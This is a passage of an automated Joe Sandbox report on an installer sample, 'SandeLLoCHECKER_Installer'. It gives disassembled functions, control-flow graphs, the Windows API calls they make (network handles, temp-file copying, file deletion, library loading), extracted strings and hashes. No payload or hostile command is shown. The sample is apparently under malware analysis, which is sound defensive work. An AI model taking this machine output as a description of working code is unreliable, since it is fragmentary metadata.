                                                                                                                        • Opcode Fuzzy Hash: 70a37ea31eeac06dbc327b2d056c3dadbc4757cc8e8f3f1419af617a97f46b16
                                                                                                                        • Instruction Fuzzy Hash: 0361B331500604EFDB21EF68CD48B5ABBB5FF04320F14866AE8659B3E1DB75A905CF92
                                                                                                                        Function 009964A0 Relevance: 19.8, APIs: 8, Strings: 3, Instructions: 507networksynchronizationCOMMON
                                                                                                                        Download Yara Rule

                                                                                                                        Control-flow Graph

                                                                                                                        • Executed
                                                                                                                        • Not Executed
                                                                                                                        control_flow_graph 1801 9964a0-9964dc call 998500 1804 99664c-99665d 1801->1804 1805 9964e2-996507 call 84abe0 1801->1805 1808 99650d-996543 call 998a10 1805->1808 1809 996660-9966cd call 84a8a0 call 84abe0 1805->1809 1817 996550-9965a7 1808->1817 1818 996545-99654b 1808->1818 1819 9966d3-99670d call 9961c0 call 9964a0 1809->1819 1820 996aa7-996aac call 84a8a0 1809->1820 1822 9965a9-9965d0 ResetEvent InternetCloseHandle WaitForSingleObject * 2 1817->1822 1823 9965d2-9965fc InternetSetStatusCallbackW InternetCloseHandle 1817->1823 1821 996603-996622 1818->1821 1837 996713-996732 call 84a3d0 1819->1837 1838 996a76-996aa6 call 978cf0 call a15d9a 1819->1838 1828 996ab1-996ab6 call 84a8a0 1820->1828 1826 99662c-996645 InternetSetStatusCallbackW InternetCloseHandle 1821->1826 1827 996624-996627 1821->1827 1822->1823 1823->1821 1826->1804 1827->1826 1832 996abb-996ad6 call 84a8a0 1828->1832 1839 996ad8 1832->1839 1840 996adb 1832->1840 1846 996738-99675a call 84abe0 1837->1846 1847 996a5d-996a6c 1837->1847 1839->1840 1846->1828 1852 996760-99677c 1846->1852 1847->1838 1848 996a6e-996a71 1847->1848 1848->1838 1854 996789-996790 call 84a720 1852->1854 1855 99677e-996787 call 84a190 1852->1855 1859 996795-9967bf call 963570 1854->1859 1855->1859 1862 9967c9-9967ce 1859->1862 1863 9967c1-9967c4 1859->1863 1864 9969fd-996a06 1862->1864 1865 9967d4 1862->1865 1863->1862 1866 996a08-996a0d 1864->1866 1867 996a4c-996a56 1864->1867 1865->1832 1868 9967da-9967e2 1865->1868 1869 996a3c-996a45 call a1fcc9 1866->1869 1870 996a0f 1866->1870 1867->1847 1871 9967e4-9967ea 1868->1871 1869->1867 1872 996a10-996a29 1870->1872 1874 99680a-99680c 1871->1874 1875 9967ec-9967ef 1871->1875 1877 996a2b-996a2e 1872->1877 1878 996a33-996a3a 1872->1878 1876 99680f-996811 1874->1876 1880 9967f1-9967f9 1875->1880 1881 996806-996808 1875->1881 1876->1864 1882 996817-99682d call 84abe0 1876->1882 1877->1878 1878->1869 1878->1872 1880->1874 1883 9967fb-996804 1880->1883 1881->1876 1882->1820 1886 996833-99684f 1882->1886 1883->1871 1883->1881 1888 99685c-996863 call 84a720 1886->1888 1889 996851-99685a call 84a190 1886->1889 1893 996868-996870 1888->1893 1889->1893 1893->1832 1894 996876-99689f call 963570 1893->1894 1897 9968a9-9968b2 call 84abe0 1894->1897 1898 9968a1-9968a4 1894->1898 1897->1820 1901 9968b8-9968d0 call 84abe0 1897->1901 1898->1897 1901->1820 1905 9968d6-9968e9 1901->1905 1907 9968eb-996900 call 963190 call 862300 1905->1907 1908 996921-996926 1905->1908 1907->1832 1925 996906-99691e call 98f410 call 862300 1907->1925 1910 996928-99692e 1908->1910 1912 99694e-996950 1910->1912 1913 996930-996933 1910->1913 1914 996953-996955 1912->1914 1916 99694a-99694c 1913->1916 1917 996935-99693d 1913->1917 1918 996963-996974 1914->1918 1919 996957-99695e call 862300 1914->1919 1916->1914 1917->1912 1921 99693f-996948 1917->1921 1923 99697e-99698f 1918->1923 1924 996976-996979 1918->1924 1919->1918 1921->1910 1921->1916 1927 996999-9969a2 1923->1927 1928 996991-996994 1923->1928 1924->1923 1925->1908 1930 9969ec-9969f6 1927->1930 1931 9969a4-9969a9 1927->1931 1928->1927 1930->1864 1933 9969ab 1931->1933 1934 9969dc-9969e5 call a1fcc9 1931->1934 1937 9969b0-9969c9 1933->1937 1934->1930 1939 9969cb-9969ce 1937->1939 1940 9969d3-9969da 1937->1940 1939->1940 1940->1934 1940->1937
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 00998500: CreateEventW.KERNEL32(00000000,00000001,00000000,00000000,?,?,?,009964DA,?,C7BA013E,?,?,?,?,00A89C55,000000FF), ref: 0099850D
                                                                                                                          • Part of subcall function 00998500: CreateEventW.KERNEL32(00000000,00000001,00000000,00000000,?,?,009964DA,?,C7BA013E,?,?,?,?,00A89C55,000000FF,?), ref: 0099852E
                                                                                                                          • Part of subcall function 00998500: InternetOpenW.WININET(AdvancedInstaller,00000003,00000000,00000000,10000000), ref: 0099857B
                                                                                                                          • Part of subcall function 00998500: GetLastError.KERNEL32(?,C7BA013E,?,?,?,?,00A89C55,000000FF,?,00995E0D,?,?,00000000,?,?), ref: 0099858E
                                                                                                                          • Part of subcall function 0084ABE0: GetProcessHeap.KERNEL32 ref: 0084AC35
                                                                                                                          • Part of subcall function 0084ABE0: __Init_thread_footer.LIBCMT ref: 0084AC67
                                                                                                                          • Part of subcall function 0084ABE0: __Init_thread_footer.LIBCMT ref: 0084ACF2
                                                                                                                        • ResetEvent.KERNEL32(?,00000000,00A89A25), ref: 009965AA
                                                                                                                        • InternetCloseHandle.WININET(00000001), ref: 009965B1
                                                                                                                        • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 009965C9
                                                                                                                        • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 009965D0
                                                                                                                        • InternetSetStatusCallbackW.WININET(?,00000000), ref: 009965F1
                                                                                                                        • InternetCloseHandle.WININET(?), ref: 009965FA
                                                                                                                        • InternetSetStatusCallbackW.WININET(00000000,00000000), ref: 0099663D
                                                                                                                        • InternetCloseHandle.WININET(00000000), ref: 00996640
                                                                                                                          • Part of subcall function 0084A190: FindResourceW.KERNEL32(00000000,?,00000006,00000000,00000000,00000000,0084A308,-00000010,?,00000000), ref: 0084A1B3
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.2894907432.0000000000841000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00840000, based on PE: true
                                                                                                                        • Associated: 00000003.00000002.2894858257.0000000000840000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895305129.0000000000A9F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895445176.0000000000B2C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895464968.0000000000B2E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895505328.0000000000B2F000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895568132.0000000000B3A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_3_2_840000_SandeLLoCHECKER_Installer.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Internet$CloseEventHandle$CallbackCreateInit_thread_footerObjectSingleStatusWait$ErrorFindHeapLastOpenProcessResetResource
                                                                                                                        • String ID: GET$attachment$filename
                                                                                                                        • API String ID: 789550500-3911147371
                                                                                                                        • Opcode ID: 80a2c248155f266c3cbc411c98730e32ce25b5c3a25fc09ea515be336757396d
                                                                                                                        • Instruction ID: 184317f80ff21a3030cf86fd87212f45d99054c6157311fe5289514f2707bd78
                                                                                                                        • Opcode Fuzzy Hash: 80a2c248155f266c3cbc411c98730e32ce25b5c3a25fc09ea515be336757396d
                                                                                                                        • Instruction Fuzzy Hash: 37127A70901249DFDF10DFACC948BAEBBF8FF15314F148169E815AB291EB759A04CBA1
                                                                                                                        Function 00995D50 Relevance: 14.3, APIs: 6, Strings: 2, Instructions: 319synchronizationnetworkfileCOMMON
                                                                                                                        Download Yara Rule

                                                                                                                        Control-flow Graph

                                                                                                                        • Executed
                                                                                                                        • Not Executed
                                                                                                                        control_flow_graph 2149 995d50-995da4 call 9961c0 call 84abe0 2154 995daa-995dbb 2149->2154 2155 995e64-995ef0 call 84a8a0 call 851c40 call 9961c0 2149->2155 2160 995dbd-995dc3 2154->2160 2161 995df1 2154->2161 2174 995ef7-995f0d call 84abe0 2155->2174 2164 995dd3-995dd8 2160->2164 2165 995dc5-995dd1 call 84a190 2160->2165 2163 995df3-995df8 call 84a720 2161->2163 2172 995dfd-995e08 call 9964a0 2163->2172 2166 995de0-995de9 2164->2166 2165->2172 2166->2166 2170 995deb-995def 2166->2170 2170->2163 2177 995e0d-995e27 2172->2177 2181 9960a0-9960ea call 84a8a0 2174->2181 2182 995f13-995f27 2174->2182 2179 995e29-995e2c 2177->2179 2180 995e31-995e63 call 978cf0 call a15d9a 2177->2180 2179->2180 2189 9960ec-9960fa ResetEvent 2181->2189 2190 996120-996132 2181->2190 2191 995f29-995f2f 2182->2191 2192 995f58 2182->2192 2197 99610a-99611a WaitForSingleObject * 2 2189->2197 2198 9960fc-996103 InternetCloseHandle 2189->2198 2194 996142-996151 2190->2194 2195 996134-99613b InternetCloseHandle 2190->2195 2199 995f31-995f40 call 84a190 2191->2199 2200 995f42-995f44 2191->2200 2196 995f5a-995f62 call 84a720 2192->2196 2195->2194 2205 995f67-995f74 call 84abe0 2196->2205 2197->2190 2198->2197 2199->2205 2201 995f47-995f50 2200->2201 2201->2201 2204 995f52-995f56 2201->2204 2204->2196 2205->2181 2209 995f7a-995f8e 2205->2209 2211 995fc1 2209->2211 2212 995f90-995f96 2209->2212 2213 995fc3-995fcb call 84a720 2211->2213 2214 995fa9-995fae 2212->2214 2215 995f98-995fa7 call 84a190 2212->2215 2220 995fd0-996007 call 997390 2213->2220 2216 995fb0-995fb9 2214->2216 2215->2220 2216->2216 2219 995fbb-995fbf 2216->2219 2219->2213 2224 996009-99600c 2220->2224 2225 996011-996029 2220->2225 2224->2225 2226 99602b-99602e 2225->2226 2227 996033-996035 2225->2227 2226->2227 2228 996047 2227->2228 2229 996037-99603f 2227->2229 2231 99604e-99609f DeleteFileW call 978cf0 call 848860 call a15d9a 2228->2231 2229->2174 2230 996045 2229->2230 2230->2231
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 0084ABE0: GetProcessHeap.KERNEL32 ref: 0084AC35
                                                                                                                          • Part of subcall function 0084ABE0: __Init_thread_footer.LIBCMT ref: 0084AC67
                                                                                                                          • Part of subcall function 0084ABE0: __Init_thread_footer.LIBCMT ref: 0084ACF2
                                                                                                                        • DeleteFileW.KERNEL32(?,?,?,?,00000000,?,?,?,?), ref: 0099605A
                                                                                                                          • Part of subcall function 0084A190: FindResourceW.KERNEL32(00000000,?,00000006,00000000,00000000,00000000,0084A308,-00000010,?,00000000), ref: 0084A1B3
                                                                                                                          • Part of subcall function 0084A8A0: RtlAllocateHeap.NTDLL(?,00000000,?,C7BA013E,00000000,00A3DE90,000000FF,?,?,00B277EC,?,009A5D66,8000000B,C7BA013E), ref: 0084A8EA
                                                                                                                        • ResetEvent.KERNEL32(00000000,C7BA013E,?,?,00000000,00A89AFD,000000FF,?,80004005), ref: 009960EF
                                                                                                                        • InternetCloseHandle.WININET(00000000), ref: 009960FD
                                                                                                                        • WaitForSingleObject.KERNEL32(?,000000FF,?,?,00000000,00A89AFD,000000FF,?,80004005), ref: 0099610F
                                                                                                                        • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,00000000,00A89AFD,000000FF,?,80004005), ref: 0099611A
                                                                                                                        • InternetCloseHandle.WININET(00000000), ref: 00996135
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.2894907432.0000000000841000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00840000, based on PE: true
                                                                                                                        • Associated: 00000003.00000002.2894858257.0000000000840000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895305129.0000000000A9F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895445176.0000000000B2C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895464968.0000000000B2E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895505328.0000000000B2F000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895568132.0000000000B3A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_3_2_840000_SandeLLoCHECKER_Installer.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: CloseHandleHeapInit_thread_footerInternetObjectSingleWait$AllocateDeleteEventFileFindProcessResetResource
                                                                                                                        • String ID: TEST$tin9999.tmp
                                                                                                                        • API String ID: 2171520157-3424081289
                                                                                                                        • Opcode ID: a779d1e4675b0b9f8132cc857b094c99d5e9a17eded58ceeec3508ef8d89c79a
                                                                                                                        • Instruction ID: b5c2956fb83d649b3c33a7c3a33de7f14b7ea88e2484af0ec8eb6b76fa7ec095
                                                                                                                        • Opcode Fuzzy Hash: a779d1e4675b0b9f8132cc857b094c99d5e9a17eded58ceeec3508ef8d89c79a
                                                                                                                        • Instruction Fuzzy Hash: 3CC1D171900649DFDF14DB68CD48BAEB7B8FF04324F148269E816AB291DB749E04CB91
                                                                                                                        Function 00A156D5 Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 58libraryCOMMON
                                                                                                                        Download Yara Rule

                                                                                                                        Control-flow Graph

                                                                                                                        • Executed
                                                                                                                        • Not Executed
                                                                                                                        control_flow_graph 2238 a156d5-a156e0 2239 a156e2-a156ee DecodePointer 2238->2239 2240 a156ef-a15706 LoadLibraryExA 2238->2240 2241 a15780 2240->2241 2242 a15708-a1571d call a15785 2240->2242 2243 a15782-a15784 2241->2243 2242->2241 2246 a1571f-a15734 call a15785 2242->2246 2246->2241 2249 a15736-a1574b call a15785 2246->2249 2249->2241 2252 a1574d-a15762 call a15785 2249->2252 2252->2241 2255 a15764-a1577e DecodePointer 2252->2255 2255->2243
                                                                                                                        APIs
                                                                                                                        • DecodePointer.KERNEL32(?,00000000,?,00A15A74,00B2FDFC,?,00000000,?,0098ABAC,?,00000000,00000000,?,?), ref: 00A156E7
                                                                                                                        • LoadLibraryExA.KERNEL32(atlthunk.dll,00000000,00000800,?,00000000,?,00A15A74,00B2FDFC,?,00000000,?,0098ABAC,?,00000000,00000000), ref: 00A156FC
                                                                                                                        • DecodePointer.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00A15778
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.2894907432.0000000000841000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00840000, based on PE: true
                                                                                                                        • Associated: 00000003.00000002.2894858257.0000000000840000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895305129.0000000000A9F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895445176.0000000000B2C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895464968.0000000000B2E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895505328.0000000000B2F000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895568132.0000000000B3A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_3_2_840000_SandeLLoCHECKER_Installer.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: DecodePointer$LibraryLoad
                                                                                                                        • String ID: AtlThunk_AllocateData$AtlThunk_DataToCode$AtlThunk_FreeData$AtlThunk_InitData$atlthunk.dll
                                                                                                                        • API String ID: 1423960858-1745123996
                                                                                                                        • Opcode ID: e449b32ec8d543036db7ab5e4fb51d24b24d24af8205ea9637d4965f962bc798
                                                                                                                        • Instruction ID: 2ffe1d359ea98e6afb99db25be1cfd0d67148311c5dd1194c0bbaf1fad44c5fc
                                                                                                                        • Opcode Fuzzy Hash: e449b32ec8d543036db7ab5e4fb51d24b24d24af8205ea9637d4965f962bc798
                                                                                                                        • Instruction Fuzzy Hash: CD01D631A40721FFCA16AB70AD43FD937A49F42749F140974FC45B72E2EBA19A89C1C5
                                                                                                                        Function 0096AA80 Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 290fileCOMMON
                                                                                                                        Download Yara Rule

                                                                                                                        Control-flow Graph

                                                                                                                        • Executed
                                                                                                                        • Not Executed
                                                                                                                        control_flow_graph 2256 96aa80-96aac6 call 965b10 2259 96ad90-96ad98 call 96ae40 2256->2259 2260 96aacc-96aae8 SHGetFolderPathW 2256->2260 2268 96ad9c-96adb9 call a15d9a 2259->2268 2261 96aafa-96ab09 2260->2261 2262 96aaea 2260->2262 2266 96ab22-96ab33 call 945350 2261->2266 2267 96ab0b 2261->2267 2265 96aaf0-96aaf8 2262->2265 2265->2261 2265->2265 2275 96ab57-96ab81 call 851660 call 951e50 2266->2275 2276 96ab35 2266->2276 2270 96ab10-96ab18 2267->2270 2270->2270 2273 96ab1a-96ab1c 2270->2273 2273->2259 2273->2266 2283 96ab85-96ab8e call 84abe0 2275->2283 2284 96ab83 2275->2284 2277 96ab40-96ab4c 2276->2277 2277->2259 2279 96ab52-96ab55 2277->2279 2279->2275 2279->2277 2287 96ab94-96aba8 2283->2287 2288 96adbc-96adc1 call 84a8a0 2283->2288 2284->2283 2292 96abe1 2287->2292 2293 96abaa-96abb0 2287->2293 2291 96adc6-96ae09 call 84a8a0 2288->2291 2301 96ae13-96ae2c call a16458 2291->2301 2302 96ae0b-96ae0d DeleteFileW 2291->2302 2298 96abe3-96abeb call 84a720 2292->2298 2295 96abb2-96abc1 call 84a190 2293->2295 2296 96abc3-96abc8 2293->2296 2307 96abf0-96ac19 call 848860 * 2 2295->2307 2300 96abd0-96abd9 2296->2300 2298->2307 2300->2300 2305 96abdb-96abdf 2300->2305 2302->2301 2305->2298 2313 96ac1b-96ac20 2307->2313 2314 96ac48-96ac77 call a18120 GetTempFileNameW 2307->2314 2313->2291 2315 96ac26-96ac28 2313->2315 2320 96ac82-96ac91 2314->2320 2321 96ac79-96ac7f call a16458 2314->2321 2315->2291 2317 96ac2e-96ac33 2315->2317 2317->2314 2319 96ac35-96ac42 call 862420 2317->2319 2319->2314 2324 96ac93-96ac9b 2320->2324 2325 96ac9d-96acc7 call a1645d 2320->2325 2321->2320 2324->2324 2324->2325 2330 96aceb-96ad38 Wow64DisableWow64FsRedirection CopyFileW 2325->2330 2331 96acc9-96acd2 2325->2331 2333 96ad42-96ad4d 2330->2333 2334 96ad3a-96ad3d call 96ae40 2330->2334 2332 96acd4-96ace3 2331->2332 2332->2332 2335 96ace5 2332->2335 2337 96ad6f-96ad84 2333->2337 2338 96ad4f-96ad69 Wow64RevertWow64FsRedirection 2333->2338 2334->2333 2335->2330 2337->2268 2339 96ad86-96ad8e 2337->2339 2338->2337 2339->2268
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 00965B10: __Init_thread_footer.LIBCMT ref: 00965BE2
                                                                                                                        • SHGetFolderPathW.SHELL32(00000000,00000024,00000000,00000000,?,C7BA013E,00000000,00000000,?), ref: 0096AADB
                                                                                                                        • GetTempFileNameW.KERNEL32(00000000,shim_clone,00000000,?,?,?,00000000,00000000), ref: 0096AC6D
                                                                                                                        • Wow64DisableWow64FsRedirection.KERNEL32(?,?,?,?,00000000,00000000), ref: 0096AD07
                                                                                                                        • CopyFileW.KERNEL32(?,?,00000000,?,?,?,00000000,00000000), ref: 0096AD29
                                                                                                                        • Wow64RevertWow64FsRedirection.KERNEL32(?), ref: 0096AD55
                                                                                                                        • DeleteFileW.KERNEL32(?,C7BA013E,00000000,00000000,00A3DEE0,000000FF,?,80070057,80004005,?), ref: 0096AE0D
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.2894907432.0000000000841000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00840000, based on PE: true
                                                                                                                        • Associated: 00000003.00000002.2894858257.0000000000840000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895305129.0000000000A9F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895445176.0000000000B2C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895464968.0000000000B2E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895505328.0000000000B2F000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895568132.0000000000B3A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_3_2_840000_SandeLLoCHECKER_Installer.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Wow64$File$Redirection$CopyDeleteDisableFolderInit_thread_footerNamePathRevertTemp
                                                                                                                        • String ID: shim_clone
                                                                                                                        • API String ID: 896069032-3944563459
                                                                                                                        • Opcode ID: d225fab5a9e989c5c7689118e53c30747d522c26867137b1cdbfde80363f3f40
                                                                                                                        • Instruction ID: 6ccbce02f36d919d584d9bb73e2b3f576eb3f7c20f1d2e7f8b8befe7967b2eb4
                                                                                                                        • Opcode Fuzzy Hash: d225fab5a9e989c5c7689118e53c30747d522c26867137b1cdbfde80363f3f40
                                                                                                                        • Instruction Fuzzy Hash: 81A11570A00658DFDB29DB24CC55BAAB7B9FF44300F5440ADE90AE7292DB349E44CF56
                                                                                                                        Function 00947F20 Relevance: 12.5, APIs: 4, Strings: 3, Instructions: 253COMMON
                                                                                                                        Download Yara Rule

                                                                                                                        Control-flow Graph

                                                                                                                        • Executed
                                                                                                                        • Not Executed
                                                                                                                        control_flow_graph 2341 947f20-947f7c call 947e10 call 84abe0 2346 947f82 2341->2346 2347 94806d-9480e4 call 84a8a0 FreeLibrary EnterCriticalSection 2341->2347 2348 947f85-947fb5 call 849c00 call 960970 2346->2348 2352 9480e6-9480ea 2347->2352 2353 94812e-94814f 2347->2353 2379 947fb7-947fce 2348->2379 2380 947fea-947ffa 2348->2380 2355 9480fc-9480fe 2352->2355 2356 9480ec-9480f6 DestroyWindow 2352->2356 2360 948151-948155 2353->2360 2361 94818f-948197 2353->2361 2355->2353 2359 948100-948104 2355->2359 2356->2355 2363 948115-94812b call a15da8 2359->2363 2364 948106-94810f call a1fcc9 2359->2364 2367 948166-94816b 2360->2367 2368 948157-948160 call a1fcc9 2360->2368 2365 9481c3-9481d1 2361->2365 2366 948199-94819c 2361->2366 2363->2353 2364->2363 2375 9481d3-9481d7 2365->2375 2376 9481ed-948201 call 94a470 2365->2376 2366->2365 2373 94819e 2366->2373 2377 94817d-94818c call a15da8 2367->2377 2378 94816d-948176 call a1fcc9 2367->2378 2368->2367 2382 9481a0-9481a5 2373->2382 2386 9481e6-9481eb 2375->2386 2387 9481d9-9481e0 2375->2387 2404 948203 2376->2404 2405 948209-94821a 2376->2405 2377->2361 2378->2377 2390 947fd0-947fd3 2379->2390 2391 947fd8-947fe2 call 84abe0 2379->2391 2383 948040-94804f 2380->2383 2384 947ffc-948000 2380->2384 2397 9481a7-9481a9 2382->2397 2398 9481ad-9481c1 2382->2398 2395 948051-948054 2383->2395 2396 948059-94806c 2383->2396 2399 948032-948038 call 84a720 2384->2399 2400 948002-948006 2384->2400 2386->2375 2386->2376 2387->2386 2390->2391 2391->2347 2409 947fe8 2391->2409 2395->2396 2397->2398 2398->2365 2398->2382 2412 94803d 2399->2412 2400->2399 2406 948008-94801e call 84a3d0 2400->2406 2404->2405 2414 948020-948028 2406->2414 2415 94802b-948030 2406->2415 2409->2348 2412->2383 2414->2415 2415->2412
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 00947F20: GetModuleFileNameW.KERNEL32(00000000,?,00000104,C7BA013E,00000000,?,00A7B216,000000FF), ref: 00947E68
                                                                                                                          • Part of subcall function 0084ABE0: GetProcessHeap.KERNEL32 ref: 0084AC35
                                                                                                                          • Part of subcall function 0084ABE0: __Init_thread_footer.LIBCMT ref: 0084AC67
                                                                                                                          • Part of subcall function 0084ABE0: __Init_thread_footer.LIBCMT ref: 0084ACF2
                                                                                                                        • FreeLibrary.KERNEL32(00000001,C7BA013E,?,00000001,?,?,?), ref: 009480B7
                                                                                                                        • EnterCriticalSection.KERNEL32(00B314EC), ref: 009480D2
                                                                                                                        • DestroyWindow.USER32(00000000), ref: 009480F0
                                                                                                                        • LeaveCriticalSection.KERNEL32(00B314EC), ref: 00948139
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.2894907432.0000000000841000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00840000, based on PE: true
                                                                                                                        • Associated: 00000003.00000002.2894858257.0000000000840000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895305129.0000000000A9F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895445176.0000000000B2C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895464968.0000000000B2E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895505328.0000000000B2F000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895568132.0000000000B3A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_3_2_840000_SandeLLoCHECKER_Installer.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: CriticalInit_thread_footerSection$DestroyEnterFileFreeHeapLeaveLibraryModuleNameProcessWindow
                                                                                                                        • String ID: v$%s%lu$.local
                                                                                                                        • API String ID: 3496055493-1141559199
                                                                                                                        • Opcode ID: aa14e630b5643752316bc2333a95dc684ac6d75d689ac0eee378daaeed288670
                                                                                                                        • Instruction ID: bd6e639ada706dc98219bac6ce3d8aa3ce242048965ae11a136d8d5d64ee7e5b
                                                                                                                        • Opcode Fuzzy Hash: aa14e630b5643752316bc2333a95dc684ac6d75d689ac0eee378daaeed288670
                                                                                                                        • Instruction Fuzzy Hash: 8191CC71A01205DFDB20DF68C844BAFBBF8FF44314F14856AE815AB391DB749804CB91
                                                                                                                        Function 0084F120 Relevance: 12.4, APIs: 1, Strings: 6, Instructions: 139COMMON
                                                                                                                        Download Yara Rule

                                                                                                                        Control-flow Graph

                                                                                                                        • Executed
                                                                                                                        • Not Executed
                                                                                                                        control_flow_graph 2417 84f120-84f170 2419 84f1b7-84f23f call 851250 call 84fac0 call 84f0a0 call 84fa10 2417->2419 2420 84f172-84f1b4 2417->2420 2430 84f241-84f244 call 84e560 2419->2430 2431 84f249-84f24b 2419->2431 2430->2431 2433 84f265-84f287 2431->2433 2434 84f24d-84f263 call 84f120 2431->2434 2436 84f289-84f296 InterlockedPushEntrySList 2433->2436 2437 84f29b-84f2b6 call 84f120 2433->2437 2441 84f2bd-84f2c8 2434->2441 2436->2437 2437->2441 2442 84f2d2-84f2e5 2441->2442 2443 84f2ca-84f2cd call 84e560 2441->2443 2443->2442
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.2894907432.0000000000841000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00840000, based on PE: true
                                                                                                                        • Associated: 00000003.00000002.2894858257.0000000000840000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895305129.0000000000A9F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895445176.0000000000B2C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895464968.0000000000B2E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895505328.0000000000B2F000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895568132.0000000000B3A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_3_2_840000_SandeLLoCHECKER_Installer.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: .dll$CoIncrementMTAUsage$DllGetActivationFactory$RoGetActivationFactory$Windows.Foundation.Uri$combase.dll
                                                                                                                        • API String ID: 0-3956872289
                                                                                                                        • Opcode ID: b596cd22f14d968a4134b99b76456c22b181182cafc213723b8d5de89ed1b408
                                                                                                                        • Instruction ID: ce3de949a4abf5c5da06deda69d565500c3715a417d504449ed141f6205c505a
                                                                                                                        • Opcode Fuzzy Hash: b596cd22f14d968a4134b99b76456c22b181182cafc213723b8d5de89ed1b408
                                                                                                                        • Instruction Fuzzy Hash: D1517971D0021DEFDB00DFA8C945BAEBBB4FF08718F204569E915AB391DBB56A04CB91
                                                                                                                        Function 00988F10 Relevance: 10.7, APIs: 4, Strings: 2, Instructions: 238fileCOMMON
                                                                                                                        Download Yara Rule

                                                                                                                        Control-flow Graph

